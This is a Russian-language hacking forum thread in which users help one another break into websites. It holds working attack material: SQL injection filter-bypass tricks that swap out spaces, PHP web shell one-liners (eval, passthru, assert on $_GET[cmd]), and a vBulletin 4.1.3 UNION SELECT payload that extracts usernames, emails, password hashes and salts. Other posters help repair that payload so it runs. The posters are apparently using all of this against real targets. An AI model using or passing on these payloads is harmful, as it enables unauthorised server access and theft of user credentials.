Никак, то что Ereee привел вообще не inj, там же написано в заголовке. Зато ниже постом ниже уже описание sql inj через User Agent.
А как тогда использовать ту скулю с user agent? ---------- Есть ли какой-нибудь инструмент для удобства использования такой скули?
блин я чувствую что уже рядом моя цель. в моем phpmyadmine версии 2.9.1.1 таких "команд" типа options, view text, full не существует как бы. Есть ключ или как говорит phpmyadmin индекс с названием full text. Сам в ключах не разбираюсь, и как это использовать так же не знаю. Мне нужен такой человек, который прошел через такую админку. Чтобы опыт был, если по другому.
Я вас наверно уже задолбал) ну ладно) при открытии мини-шелла с кодом: Code: <?php eval($_GET[cmd]); ?> получается вот такая петрушка при ?cmd=phpinfo() и так далее: либо unexpected $end либо T_STRING system не катит, так как disallow. в чем подвох?
Вот такое нагуглил, может, что-нибудь подойдет в твоем случае PHP: Q: Нашел sql-инъекцию, но злые админы поставили на фильтрацию на пробел. Существуют ли аналоги пробела в sql-запросах? A: Еще как существуют! Вот наиболее часто применяемые способы для замены пробела: + или %2B; табуляция " " или %09; возврат каретки " " или %0D; перевод строки %0A; коментарий /**/ скобки: select(1)from(users)where(id=1) PHP: <? passthru($_GET[cmd]); ?> <?assert($_GET[cmd]); ?> Поэкспериментируй с этими.
Нашел эксплоит на exploit-db.com для Vbulletin 4.1.3 Code: &messagegroupid[0]=3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1 а DB мне в ответ вот так: Code: Invalid SQL: SELECT socialgroup.name FROM socialgroup AS socialgroup WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1); MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3 Вопрос: как победить эту долбаную скобку в конце?
Добавить вот здесь: &messagegroupid[0]=3) UNION (SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1
тогда нужно сделать так &messagegroupid[0]=3) UNION (SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt)) FROM user WHERE userid=1